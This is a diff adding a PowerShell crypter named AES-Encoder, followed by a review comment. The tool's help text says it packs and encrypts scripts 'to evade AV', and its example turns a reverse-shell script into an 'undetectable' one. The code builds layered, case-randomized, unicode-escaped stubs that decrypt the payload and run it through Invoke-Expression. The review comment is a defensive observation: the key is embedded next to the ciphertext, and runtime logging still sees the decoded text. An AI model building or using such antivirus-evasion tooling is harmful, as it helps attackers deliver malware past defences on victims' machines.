1+ # AES-Encoder - PowerShell crypter
2+ # Copyright (C) 2022 Chainski
3+ #
4+ # This program is free software: you can redistribute it and/or modify
5+ # it under the terms of the GNU General Public License as published by
6+ # the Free Software Foundation, either version 3 of the License, or
7+ # (at your option) any later version.
8+ #
9+ # This program is distributed in the hope that it will be useful,
10+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
11+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12+ # GNU General Public License for more details.
13+ #
14+ # You should have received a copy of the GNU General Public License
15+ # along with this program. If not, see <https://www.gnu.org/licenses/>.
16+ # Made by https://github.com/chainski
17+
18+ $console = $host.UI.RawUI
19+ $console.WindowTitle = " Powershell AES-Encoder"
20+ Set-StrictMode - Version Latest
21+ $ErrorActionPreference = " Stop"
22+ $PSDefaultParameterValues [' *:ErrorAction' ]= ' Stop'
23+
24+ function Create-Var () {
25+
26+ (1 .. 9 | % {[byte ](Get-Random - Max 256 )}| foreach ToString X2) -join ' '
27+ }
28+
29+ function RAND () {
30+
31+ $set = " xQpVQLuQpVQpVQpVQpVQWpVQpVQpVQpVQpVQpVQpKVQpVQpVQpVQpV"
32+ (1 .. (6 + (Get-Random - minimum 8 - Maximum 10 )) | % { $set [(Get-Random - Minimum 10 - Maximum $set.Length )] } ) -join ' '
33+ }
34+
35+ function Invoke-AES-Encoder {
36+ <#
37+ . SYNOPSIS
38+
39+ Invoke-AES-Encoder takes any PowerShell script as an input and both packs and encrypts it to evade AV.
40+ It also lets you layer this recursively however many times you want in order to foil dynamic & heuristic detection.
41+
42+ . DESCRIPTION
43+
44+ Invoke-AES-Encoder takes any PowerShell script as an input and both packs and encrypts it to evade AV.
45+ The output script is highly randomized in order to make static analysis even more difficut.
46+ It also lets you layer this recursively however many times you want in order to attempt to foil dynamic & heuristic detection.
47+
48+
49+ . PARAMETER InFile
50+ Specifies the script to obfuscate/encrypt.
51+
52+ . PARAMETER OutFile
53+ Specifies the output script.
54+
55+ . PARAMETER Iterations
56+ The number of times the PowerShell script will be packed & crypted recursively. Default is 4.
57+
58+ . EXAMPLE
59+
60+ PS> Invoke-AES-Encoder -InFile reverse-shell.ps1 -OutFile undetectable.ps1 -Iterations 12
61+
62+ . LINK
63+
64+ https://github.com/chainski/AES-Encoder
65+
66+ #>
67+
68+ [CmdletBinding ()]
69+ Param (
70+ [Parameter (Mandatory , ValueFromPipeline , ValueFromPipelineByPropertyName )]
71+ [string ] $infile = $ (Throw (" -InFile is required" )),
72+ [Parameter (Mandatory , ValueFromPipeline , ValueFromPipelineByPropertyName )]
73+ [string ] $outfile = $ (Throw (" -OutFile is required" )),
74+ [Parameter (Mandatory = $false , ValueFromPipeline , ValueFromPipelineByPropertyName )]
75+ [string ] $iterations = 4
76+ )
77+
78+ Process {
79+ Write-Host `r`n
80+ Write-Host - ForegroundColor Red " ░░░░░ ░░░░░░░ ░░░░░░░ ░░░░░░░ ░░░ ░░ ░░░░░░ ░░░░░░ ░░░░░░ ░░░░░░░ ░░░░░░ "
81+ Write-Host - ForegroundColor White " ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ "
82+ Write-Host - ForegroundColor Red " ▒▒▒▒▒▒▒ ▒▒▒▒▒ ▒▒▒▒▒▒▒ ▒▒▒▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒▒▒▒ ▒▒▒▒▒▒ "
83+ Write-Host - ForegroundColor White " ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ "
84+ Write-Host - ForegroundColor Red " ██ ██ ███████ ███████ ███████ ██ ████ ██████ ██████ ██████ ███████ ██ ██ "
85+ Write-Host - ForegroundColor Blue " ╔═════════════════════════════════════════╗ "
86+ Write-Host - ForegroundColor White " ║ AES Encoder 1.0.0.0 ║ "
87+ Write-Host - ForegroundColor Blue " ║ coded by Chainski ║ "
88+ Write-Host - ForegroundColor White " ║ For Educational Purposes Only ║ "
89+ Write-Host - ForegroundColor Red " ║ Github ║ "
90+ Write-Host - ForegroundColor White " ║ https://github.com/chainski/AES-Encoder ║ "
91+ Write-Host - ForegroundColor Blue " ╚═════════════════════════════════════════╝ "
92+
93+ Write-Host `r`n
94+ sleep 1
95+ # read
96+ Write-Host " [*] Reading '$ ( $infile ) ' ..."
97+ $codebytes = [System.IO.File ]::ReadAllBytes($infile )
98+
99+
100+ for ($i = 1 ; $i -le $iterations ; $i ++ ) {
101+
102+ Write-Host " [*] Starting Encryption Process ..." - ForegroundColor Red
103+ $paddingmodes = ' PKCS7' , ' ISO10126' , ' ANSIX923' , ' Zeros'
104+ $paddingmode = $paddingmodes | Get-Random
105+ $ciphermode = ' CBC'
106+ $keysizes = 128 , 192 , 256
107+ $keysize = $keysizes | Get-Random
108+ $compressiontypes = ' Gzip' , ' Deflate'
109+ $compressiontype = $compressiontypes | Get-Random
110+
111+ # compress
112+ Write-Host " [*] Compressing ..."
113+ [System.IO.MemoryStream ] $output = New-Object System.IO.MemoryStream
114+ if ($compressiontype -eq " Gzip" ) {
115+ $compressionStream = New-Object System.IO.Compression.GzipStream $output , ([IO.Compression.CompressionMode ]::Compress)
116+ } elseif ( $compressiontype -eq " Deflate" ) {
117+ $compressionStream = New-Object System.IO.Compression.DeflateStream $output , ([IO.Compression.CompressionMode ]::Compress)
118+ }
119+ $compressionStream.Write ( $codebytes , 0 , $codebytes.Length )
120+ $compressionStream.Close ()
121+ $output.Close ()
122+ $compressedBytes = $output.ToArray ()
123+
124+ # generate key
125+ Write-Host " [*] Generating Encryption Key ..."
126+
127+ $aesManaged = New-Object " System.Security.Cryptography.AesManaged"
128+ $aesManaged.Mode = [System.Security.Cryptography.CipherMode ]::CBC
129+
130+ if ($paddingmode -eq ' PKCS7' ) {
131+ $aesManaged.Padding = [System.Security.Cryptography.PaddingMode ]::PKCS7
132+ } elseif ($paddingmode -eq ' ISO10126' ) {
133+ $aesManaged.Padding = [System.Security.Cryptography.PaddingMode ]::ISO10126
134+ } elseif ($paddingmode -eq ' ANSIX923' ) {
135+ $aesManaged.Padding = [System.Security.Cryptography.PaddingMode ]::ANSIX923
136+ } elseif ($paddingmode -eq ' Zeros' ) {
137+ $aesManaged.Padding = [System.Security.Cryptography.PaddingMode ]::Zeros
138+ }
139+
140+ $aesManaged.BlockSize = 128
141+ $aesManaged.KeySize = 256
142+ $aesManaged.GenerateKey ()
143+ $b64key = [System.Convert ]::ToBase64String($aesManaged.Key )
144+
145+ # encrypt
146+ Write-Host " [*] Encrypting with AES ..." - ForegroundColor Red
147+ $encryptor = $aesManaged.CreateEncryptor ()
148+ $encryptedData = $encryptor.TransformFinalBlock ($compressedBytes , 0 , $compressedBytes.Length );
149+ [byte []] $fullData = $aesManaged.IV + $encryptedData
150+ $aesManaged.Dispose ()
151+ $b64encrypted = [System.Convert ]::ToBase64String($fullData )
152+
153+ Write-Host " [*] Randomizing Cases ..."
154+ # write
155+ Write-Host " [*] Obfuscating Layers ..."
156+
157+ # Added Support for Unicode and HTML Decoding
158+
159+ $stub_template = ' '
160+
161+ $code_alternatives = @ ()
162+ $code_alternatives += ' ([SYstEm.teXt.encODIng]::uTf8.gETSTriNG([sysTEM.cONVErT]::fRomBAse64StRInG("QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uV2ViID4gJG51bGw="))) | iex' + " `r`n "
163+ $code_alternatives += ' ${2} = [coNVeRT]::fROmbASE64sTRINg("{0}")' + " `r`n "
164+ $code_alternatives += ' ${2} = [coNVeRT]::fROmbASE64sTRINg("{0}")' + " `r`n "
165+ $code_alternatives += ' ${3} = [coNVeRT]::fRomBaSE64sTRINg("{1}")' + " `r`n "
166+ $code_alternatives += ' ${4} = [System.Net.WebUtility]::HtmlDecode("New-Object "System.Security.Cryptography.AesManaged"") | iex' + " `r`n "
167+ $code_alternatives_shuffled = $code_alternatives
168+ $stub_template += $code_alternatives_shuffled -join ' '
169+
170+ $code_alternatives = @ ()
171+ $code_alternatives += ' ${4}.ModE = [REGex]::uNesCapE("\u005b\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0053\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0043\u0072\u0079\u0070\u0074\u006f\u0067\u0072\u0061\u0070\u0068\u0079\u002e\u0043\u0069\u0070\u0068\u0065\u0072\u004d\u006f\u0064\u0065\u005d\u003a\u003a\u0043\u0042\u0043") | iex' + " `r`n "
172+ $code_alternatives += ' ${4}.Padding = [sYsTem.SECuRIty.cRYptOGRaPhy.PaDdiNgMoDe]::' + $paddingmode + " `r`n "
173+ $code_alternatives += ' ${4}.BlOckSIze = [SySTEm.NET.WeButiliTy]::hTmLdEcOdE("128") | iex' + " `r`n "
174+ $code_alternatives += ' ${4}.KeySize = ' + $keysize + " `n " + ' ${4}.Key = ${3}' + " `r`n "
175+ $code_alternatives += ' ${4}.Iv = ${2}[0..15]' + " `r`n "
176+ $code_alternatives_shuffled = $code_alternatives
177+ $stub_template += $code_alternatives_shuffled -join ' '
178+
179+ $code_alternatives = @ ()
180+ $code_alternatives += ' ${6} = nEw-OBJECt sySTeM.io.mEmorYSTrEam(,${4}.CrEAtedECrYptor().TRaNsFOrmfinaLBlOCk(${2},16,${2}.LEnGth-16))' + " `r`n "
181+ $code_alternatives += ' ${7} = [RegEX]::UnESCaPe("\u004e\u0065\u0077\u002d\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0049\u004f\u002e\u004d\u0065\u006d\u006f\u0072\u0079\u0053\u0074\u0072\u0065\u0061\u006d") | iex' + " `r`n "
182+ $code_alternatives_shuffled = $code_alternatives
183+ $stub_template += $code_alternatives_shuffled -join ' '
184+
185+ if ($compressiontype -eq " Gzip" ) {
186+ $stub_template += ' ${5} = nEw-oBject sYSTEM.IO.cOmPreSsiOn.gZIpStReAM ${6}, ([IO.Compression.CompressionMode]::Decompress)' + " `r`n "
187+ } elseif ( $compressiontype -eq " Deflate" ) {
188+ $stub_template += ' ${5} = NEw-oBject SySteM.iO.ComprESsIoN.DEfLAtEsTReAM ${6}, ([io.CompREsSION.COmPressionMOdE]::DecompReSs)' + " `r`n "
189+ }
190+ $stub_template += ' ${5}.CoPyTo(${7})' + " `r`n "
191+
192+ $code_alternatives = @ ()
193+ $code_alternatives += ' ${5}.ClosE()' + " `r`n "
194+ $code_alternatives += ' ${4}.DisPoSe()' + " `r`n "
195+ $code_alternatives += ' ${6}.ClosE()' + " `r`n "
196+ $code_alternatives += ' ${8} = [sYStem.texT.enCoDIng]::uTF8.GETstrInG(${7}.tOArraY())' + " `r`n "
197+ $code_alternatives_shuffled = $code_alternatives
198+ $stub_template += $code_alternatives_shuffled -join ' '
199+ $stub_template += (' INVoke-ExPREsSion' , ' IeX' | Get-Random )+ ' (${8})' + " `r`n "
200+
201+
202+ # it's ugly, but it beats concatenating each value manually.
203+ $code = $stub_template -f $b64encrypted , $b64key , (Create- Var), (Create- Var), (RAND), (Create- Var), (Create- Var), (Create- Var), (Create- Var), (Create- Var)
204+ $codebytes = [System.Text.Encoding ]::UTF8.GetBytes($code )
205+ }
206+ Write-Host " [*] Writing '$ ( $outfile ) ' ..."
207+ [System.IO.File ]::WriteAllText($outfile , $code )
208+ Write-Host " [+] Done!" - ForegroundColor Red
209+ }
210+ }
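Review bot: The comment-based help at new-file lines 39–46 describes the output as encrypted, but the stub built at lines 163–165 and filled at line 203 places the base64 AES key (`{1}`) in the same script as the ciphertext (`{0}`), so every layer can be decoded offline from the file alone. Each layer also ends at line 199 by passing the recovered plaintext to `Invoke-Expression`/`IeX`, so hosts with AMSI and PowerShell script block logging enabled should still receive the decoded script text at every iteration. The `KeySize` written into the stub at line 174 is drawn at random while the key itself is always generated at 256 bits (line 141), so anyone analysing an output file should not treat that stub value as meaningful. I would state this in the help, for example a `.NOTES` entry reading `The key is embedded in the output next to the ciphertext; this is encoding, not confidentiality, and does not hide the script from runtime inspection.`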